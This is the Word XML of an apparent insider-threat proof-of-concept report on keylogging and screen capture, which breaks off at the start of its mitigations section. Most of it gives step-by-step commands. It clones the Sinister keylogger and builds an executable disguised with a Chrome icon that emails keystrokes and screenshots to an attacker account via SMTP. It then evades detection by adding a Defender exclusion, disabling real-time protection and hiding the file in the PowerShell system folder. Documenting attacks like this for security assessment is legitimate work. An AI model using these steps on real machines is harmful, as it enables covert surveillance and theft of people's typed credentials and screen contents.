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11C04" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="poc-2---keylogging-and-screen-capturing"/>
      <w:r>
        <w:t>POC 2 - Keylogging and Screen Capturing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C9267" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="description"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69096829" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Keylogging is the process of capturing the input on the user’s device without the user’s knowledge. Keyloggers can be used for various purposes, both legitimate and malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EDD8B8" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>legitimate reasons for the usage of keylogger software includes but is not limited to security testing and employee monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479FCCEE" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>While there are legitimate reasons to make use of keyloggers, these keyloggers can pose a serious threat towards the organisation when used by threat actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885A83E" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>This attack aims to outline the threats posed to the organisation from a misuse of keylogging tool within the organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A942DF0" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="steps-to-carry-out-exploitation"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Steps to Carry Out Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B31ABE" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>There are a total of 2 steps to be caried out during the process of enabling and making use of the Sinister tool by either an insider or by a third party threat actor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15BA9A" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The following are the 2 steps taken during the POC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA455AD" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="preparations">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Preparation Phase</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E779C5F" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="exploitation">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Exploitation Phase</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DB6D022" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The preparation phase covers all preperatory needs inclusive of the installation of tools that can possibly prepared by the threat attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695BB0A5" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The exploitation phase outlines the steps that the insider can possibly take to both remain undetected within the machine along with achieving the targeted goal of the insider threat attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334EA64" w14:textId="59B26B66" w:rsidR="00443261" w:rsidRDefault="0044326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3" w:name="preparations"/>
    </w:p>
    <w:p w14:paraId="7D94935D" w14:textId="2238AC40" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Preparations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6466E" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Git clone the Sinister repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6828B650" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>git clone https://github.com/PushpenderIndia/Sinister.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6F86B" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Navigate into the repository and install all dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D52D83" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># Navigate into the repository</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cd Sinister</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># Install dependencies</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>python -m pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21316A32" w14:textId="77777777" w:rsidR="008D5EDB" w:rsidRDefault="008D5EDB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FD22E" w14:textId="2CCF20FE" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Run the program with the following command replacing the fields </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F6F1582" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python Sinister.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-w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smtp.server.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> smtp_port_number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Windows\System32\cmd.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> example@email.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> YourEmailPass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"backup"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>/chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>.ico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63992485" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE: Modify time intervals of reporting using the following parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E301CF" w14:textId="7BA264F2" w:rsidR="0011508F" w:rsidRDefault="00000000" w:rsidP="00F20413">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># Change the reporting frequency to once a day</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-t 86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6B7B0" w14:textId="7C8213FA" w:rsidR="0011508F" w:rsidRDefault="00F20413">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20413">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254564D8" wp14:editId="24E18B1C">
            <wp:extent cx="5943600" cy="4140200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18507128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712844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BF2A1" w14:textId="03C92CC2" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="0011508F">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Creating Exploit Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97C8EC" w14:textId="7FC3C34C" w:rsidR="00F20413" w:rsidRDefault="00F20413"/>
    <w:p w14:paraId="5587FFFA" w14:textId="20078576" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate the file and store it within a removable storage </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>device</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E4F4819" w14:textId="6F6898A0" w:rsidR="0011508F" w:rsidRDefault="0011508F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exploitation"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="64F51FDC" w14:textId="77777777" w:rsidR="008D5EDB" w:rsidRDefault="008D5ED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5D73EC77" w14:textId="14283139" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343787B" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configure the Windows Defender as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71EC11" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Virus &amp; Threat Protection &gt; Virus &amp; Threat Protection Settings &gt; Manage Settings &gt; Exclusions &gt; Add or Remove Exclusions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Add Exclusion the following path</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B21187" w14:textId="1057D8EC" w:rsidR="008D5EDB" w:rsidRDefault="0087638D" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0087638D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15297F19" wp14:editId="70663AB5">
            <wp:extent cx="5943600" cy="1685290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1009360089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360089" name="Picture 1" descr="A close-up of a computer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98D71" w14:textId="1B0D1A2E" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07768595" w14:textId="77777777" w:rsidR="008A774E" w:rsidRDefault="008A774E" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2414ED" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Switch off Real-time </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>protection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="784E3749" w14:textId="77777777" w:rsidR="0087638D" w:rsidRDefault="0087638D" w:rsidP="0087638D">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5A6233" w14:textId="457E0F61" w:rsidR="008D5EDB" w:rsidRDefault="0087638D" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0087638D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1020CED0" wp14:editId="0FD17BC0">
            <wp:extent cx="5943600" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7895328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53285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EF88F" w14:textId="3A63A269" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Real-Time Protection Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CBF27" w14:textId="77777777" w:rsidR="003F7580" w:rsidRDefault="003F7580">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09924591" w14:textId="4A93B53D" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Navigate to the following directory and upload the file within the following </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B838751" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E885D8" w14:textId="6BC730A0" w:rsidR="008D5EDB" w:rsidRDefault="003F7580" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7580">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A153D9" wp14:editId="785057FC">
            <wp:extent cx="5943600" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18481644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6446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85577" w14:textId="2A575870" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Uploaded file within the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A8305" w14:textId="77777777" w:rsidR="008A774E" w:rsidRDefault="008A774E" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B381C3" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execute the executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85CCE9" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Notice an email is sent towards the account that is registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32203369" w14:textId="7C22B48A" w:rsidR="008D5EDB" w:rsidRDefault="003F7580" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7580">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A750213" wp14:editId="6B0B56F1">
            <wp:extent cx="5943600" cy="2311400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3760478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4781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93BBC" w14:textId="4448A64A" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Keylogger installed within the Target’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446AF8E" w14:textId="77777777" w:rsidR="003F7580" w:rsidRDefault="003F7580">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E55631" w14:textId="40367581" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Perform some actions like creating a file and typing some input within the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73D16BB0" w14:textId="77777777" w:rsidR="008B3361" w:rsidRDefault="008B3361" w:rsidP="008B3361">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEB69DA" w14:textId="6FF60140" w:rsidR="008D5EDB" w:rsidRDefault="003F7580" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7580">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B9AD7D4" wp14:editId="79FB7EA5">
            <wp:extent cx="5943600" cy="2668905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14477913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791323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7798A" w14:textId="75760003" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>File Content taken from Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333DD2F3" w14:textId="77777777" w:rsidR="008A774E" w:rsidRDefault="008A774E" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2E91E0" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Leave the file open to test the screen capturing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F410C" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>View the email generated and sent to the specified email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F612C" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Keylogging Strokes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2EBA3" w14:textId="124B2792" w:rsidR="008D5EDB" w:rsidRDefault="008A774E" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A774E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6839C069" wp14:editId="57FA5515">
            <wp:extent cx="5943600" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3902742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27428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FB4B4" w14:textId="18610469" w:rsidR="00285D65" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim’s Machine logged </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Key strokes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="138433F0" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Device Screen Capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4EA04" w14:textId="490CDC3D" w:rsidR="008D5EDB" w:rsidRDefault="008A774E" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A774E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D69E296" wp14:editId="1CB5C2CF">
            <wp:extent cx="5943600" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="737758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75870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99B6A" w14:textId="6E46AE98" w:rsidR="00E402BF" w:rsidRPr="008D5EDB" w:rsidRDefault="00000000" w:rsidP="008D5EDB">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Victim’s Machine Screen Capture</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="possible-mitigations-and-recommendations"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00E402BF">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB91EA2" w14:textId="0A606684" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Possible Mitigations and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8EABF" w14:textId="25925296" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="disable-path-exclusions">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Disable Path Exclusions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EB25637" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="conduct-scheduled-scans">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Conduct Scheduled Scans</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AA231A0" w14:textId="77777777" w:rsidR="00285D65" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Updating Antivirus regularly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F0C52" w14:textId="77777777" w:rsidR="00E402BF" w:rsidRDefault="00E402BF" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="conduct-scheduled-scans"/>
      <w:bookmarkStart w:id="7" w:name="disable-path-exclusions"/>
    </w:p>
    <w:p w14:paraId="0C065B70" w14:textId="35DC0A97" w:rsidR="00000391" w:rsidRDefault="00000391" w:rsidP="00000391">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Disable Path Exclusions</w:t>
